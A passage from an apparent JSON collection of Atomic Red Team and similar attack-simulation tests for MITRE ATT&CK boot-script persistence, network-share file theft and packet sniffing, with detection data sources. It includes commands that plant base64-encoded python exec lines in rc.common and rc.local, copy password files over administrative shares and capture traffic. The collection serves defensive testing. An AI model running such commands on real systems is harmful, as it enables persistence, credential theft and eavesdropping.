'#!/bin/bash' | sudo tee /etc/rc.common\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\\\"\" | sudo tee -a /etc/rc.common\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.common\nsudo chmod +x /etc/rc.common\n", + "source": "atomics/T1037.004/T1037.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Rc.common" + }, + { + "command": "filename='/etc/rc.local';if [ ! 
-f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n", + "source": "atomics/T1037.004/T1037.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Rc.common" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1037.004", + "display_name": "Boot or Logon Initialization Scripts: Rc.common", + "atomic_tests": [ + { + "name": "rc.common", + "auto_generated_guid": "97a48daa-8bca-4bc0-b1a9-c1d163e762de", + "description": "Modify rc.common\n\n[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo echo osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"' >> /etc/rc.common\n", + "elevation_required": true, + "name": "bash" + } + }, + { + "name": "rc.common", + "auto_generated_guid": "c33f3d80-5f04-419b-a13a-854d1cbdbf3a", + "description": "Modify rc.common\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "filename='/etc/rc.common';if [ ! 
-f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.common\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\\\"\" | sudo tee -a /etc/rc.common\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.common\nsudo chmod +x /etc/rc.common\n", + "cleanup_command": "origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi\n" + } + }, + { + "name": "rc.local", + "auto_generated_guid": "126f71af-e1c9-405c-94ef-26a47b16c102", + "description": "Modify rc.local\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n", + "cleanup_command": "origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1037.005", + "command_list": [ + "sudo touch /Library/StartupItems/EvilStartup.plist\n" + ], + "commands": [ + { + "command": "sudo touch /Library/StartupItems/EvilStartup.plist\n", + "source": "atomics/T1037.005/T1037.005.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Startup Items" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1037.005", + "display_name": "Boot or Logon Initialization Scripts: Startup Items", + "atomic_tests": [ + { + "name": "Add file to Local Library StartupItems", + 
"auto_generated_guid": "134627c3-75db-410e-bff8-7a920075f198", + "description": "Modify or create an file in /Library/StartupItems\n\n[Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo touch /Library/StartupItems/EvilStartup.plist\n", + "cleanup_command": "sudo rm /Library/StartupItems/EvilStartup.plist\n", + "name": "sh", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1039", + "command_list": [ + "copy \\\\127.0.0.1\\C$\\#{share_file} %TEMP%\\#{local_file}", + "copy \\\\#{remote}\\C$\\Windows\\temp\\Easter_Bunny.password %TEMP%\\#{local_file}", + "copy \\\\#{remote}\\C$\\#{share_file} %TEMP%\\Easter_egg.password", + "copy-item -Path \"\\\\127.0.0.1\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\#{local_file}\"", + "copy-item -Path \"\\\\#{remote}\\C$\\Windows\\temp\\Easter_Bunny.password\" -Destination \"$Env:TEMP\\#{local_file}\"", + "copy-item -Path \"\\\\#{remote}\\C$\\#{share_file}\" -Destination 
\"$Env:TEMP\\Easter_egg.password\"" + ], + "commands": [ + { + "command": "copy \\\\127.0.0.1\\C$\\#{share_file} %TEMP%\\#{local_file}", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy \\\\#{remote}\\C$\\Windows\\temp\\Easter_Bunny.password %TEMP%\\#{local_file}", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy \\\\#{remote}\\C$\\#{share_file} %TEMP%\\Easter_egg.password", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy-item -Path \"\\\\127.0.0.1\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\#{local_file}\"", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy-item -Path \"\\\\#{remote}\\C$\\Windows\\temp\\Easter_Bunny.password\" -Destination \"$Env:TEMP\\#{local_file}\"", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy-item -Path \"\\\\#{remote}\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\Easter_egg.password\"", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1039", + "display_name": "Data from Network Shared Drive", + "atomic_tests": [ + { + "name": "Copy a sensitive File over Administive share with copy", + "auto_generated_guid": "6ed67921-1774-44ba-bac6-adb51ed60660", + "description": "Copy from sensitive File from the c$ of another LAN computer with copy cmd\nhttps://twitter.com/SBousseaden/status/1211636381086339073", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote": { + "description": "Remote server name", + "type": "string", + "default": "127.0.0.1" + }, + "share_file": { + "description": 
"Remote Path to the file", + "type": "Path", + "default": "Windows\\temp\\Easter_Bunny.password" + }, + "local_file": { + "description": "Local name", + "type": "string", + "default": "Easter_egg.password" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Administrative share must exist on #{remote}\n", + "prereq_command": "if (Test-Path \"\\\\#{remote}\\C$\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host 'Please Enable \"C$\" share on #{remote}'\n" + }, + { + "description": "\"\\\\#{remote}\\C$\\#{share_file}\" must exist on #{remote}\n", + "prereq_command": "if (Test-Path \"\\\\#{remote}\\C$\\#{share_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Out-File -FilePath \"\\\\#{remote}\\C$\\#{share_file}\"\n" + } + ], + "executor": { + "command": "copy \\\\#{remote}\\C$\\#{share_file} %TEMP%\\#{local_file}", + "cleanup_command": "del \\\\#{remote}\\C$\\#{share_file}\ndel %TEMP%\\#{local_file}", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Copy a sensitive File over Administive share with Powershell", + "auto_generated_guid": "7762e120-5879-44ff-97f8-008b401b9a98", + "description": "Copy from sensitive File from the c$ of another LAN computer with powershell\nhttps://twitter.com/SBousseaden/status/1211636381086339073", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote": { + "description": "Remote server name", + "type": "string", + "default": "127.0.0.1" + }, + "share_file": { + "description": "Remote Path to the file", + "type": "Path", + "default": "Windows\\temp\\Easter_Bunny.password" + }, + "local_file": { + "description": "Local name", + "type": "string", + "default": "Easter_egg.password" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Administrative share must exist on #{remote}\n", + "prereq_command": "if (Test-Path \"\\\\#{remote}\\C$\") {exit 0} else {exit 1}\n", + 
"get_prereq_command": "Write-Host 'Please Enable \"C$\" share on #{remote}'\n" + }, + { + "description": "\"\\\\#{remote}\\C$\\#{share_file}\" must exist on #{remote}\n", + "prereq_command": "if (Test-Path \"\\\\#{remote}\\C$\\#{share_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Out-File -FilePath \"\\\\#{remote}\\C$\\#{share_file}\"\n" + } + ], + "executor": { + "command": "copy-item -Path \"\\\\#{remote}\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\#{local_file}\"", + "cleanup_command": "Remove-Item -Path \"\\\\#{remote}\\C$\\#{share_file}\"\nRemove-Item -Path \"$Env:TEMP\\#{local_file}\"", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5140/5145", + "Share connection" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5140/5145", + "Share connection" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands 
executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview", + "https://docs.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1040", + "command_list": [ + "tcpdump -c 5 -nnni ens33\ntshark -c 5 -i ens33\n", + "sudo tcpdump -c 5 -nnni en0A \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i en0A; fi;\n", + "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i Ethernet -c 5\n", + "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i 
#{interface} -c 5\n", + "netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10", + "pktmon.exe start --etw -f %TEMP%\\t1040.etl\nTIMEOUT /T 5 >nul 2>&1\npktmon.exe stop\n", + "pktmon.exe filter add -p 445\n", + "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n echo $path;\n exit 0;\n} else {\n echo \"Failed to generate PCAP file.\";\n exit 1;\n};\n", + "tcpdump -i en0 & sleep 5; kill $!\n", + "powershell/collection/packet_capture", + "python/collection/linux/sniffer", + "python/collection/osx/sniffer", + "tcpdump -c 5 -nnni #{interface}", + "tshark -c 5 -i #{interface}" + ], + "commands": [ + { + "command": "tcpdump -c 5 -nnni ens33\ntshark -c 5 -i ens33\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "sudo tcpdump -c 5 -nnni en0A \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i en0A; fi;\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i Ethernet -c 5\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i #{interface} -c 5\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "pktmon.exe start --etw -f %TEMP%\\t1040.etl\nTIMEOUT /T 5 >nul 2>&1\npktmon.exe stop\n", + "source": "atomics/T1040/T1040.yaml", + "name": 
"Atomic Red Team Test - Network Sniffing" + }, + { + "command": "pktmon.exe filter add -p 445\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n echo $path;\n exit 0;\n} else {\n echo \"Failed to generate PCAP file.\";\n exit 1;\n};\n", + "source": "data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml", + "name": "Perform a packet capture" + }, + { + "command": "tcpdump -i en0 & sleep 5; kill $!\n", + "source": "data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml", + "name": "Perform a packet capture" + }, + { + "command": "powershell/collection/packet_capture", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/sniffer", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/sniffer", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "tcpdump -c 5 -nnni #{interface}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "tshark -c 5 -i #{interface}", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1040", + "display_name": "Network Sniffing", + "atomic_tests": [ + { + "name": "Packet Capture Linux", + "auto_generated_guid": "7fe741f7-b265-4951-a7c7-320889083b3e", + "description": "Perform a PCAP. 
Wireshark will be required for tshark. TCPdump may already be installed.\n\nUpon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "interface": { + "description": "Specify interface to perform PCAP on.", + "type": "String", + "default": "ens33" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Check if at least one of tcpdump or tshark is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v tcpdump)\" ] && [ ! -x \"$(command -v tshark)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" + } + ], + "executor": { + "command": "tcpdump -c 5 -nnni #{interface}\ntshark -c 5 -i #{interface}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Packet Capture macOS", + "auto_generated_guid": "9d04efee-eff5-4240-b8d2-07792b873608", + "description": "Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.\n\nUpon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "interface": { + "description": "Specify interface to perform PCAP on.", + "type": "String", + "default": "en0A" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Check if at least one of tcpdump or tshark is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v tcpdump)\" ] && [ ! 
-x \"$(command -v tshark)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" + } + ], + "executor": { + "command": "sudo tcpdump -c 5 -nnni #{interface} \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Packet Capture Windows Command Prompt", + "auto_generated_guid": "a5b2f6a0-24b4-493e-9590-c699f75723ca", + "description": "Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark\ninstalled.\n\nUpon successful execution, tshark will execute and capture 5 packets on interface \"Ethernet\".\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "interface": { + "description": "Specify interface to perform PCAP on.", + "type": "String", + "default": "Ethernet" + }, + "wireshark_url": { + "description": "wireshark installer download URL", + "type": "Url", + "default": "https://1.eu.dl.wireshark.org/win64/Wireshark-win64-latest.exe" + }, + "tshark_path": { + "description": "path to tshark.exe", + "type": "Path", + "default": "c:\\program files\\wireshark\\tshark.exe" + }, + "npcap_url": { + "description": "npcap installed download URL", + "type": "Url", + "default": "https://nmap.org/npcap/dist/npcap-1.31.exe" + }, + "npcap_path": { + "description": "path to npcap.sys", + "type": "Path", + "default": "C:\\Program Files\\Npcap\\npcap.sys" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "tshark must be installed and in the default path of \"c:\\Program Files\\Wireshark\\Tshark.exe\".\n", + "prereq_command": "if (test-path \"#{tshark_path}\") {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest -OutFile $env:temp\\wireshark_installer.exe #{wireshark_url}\nStart-Process 
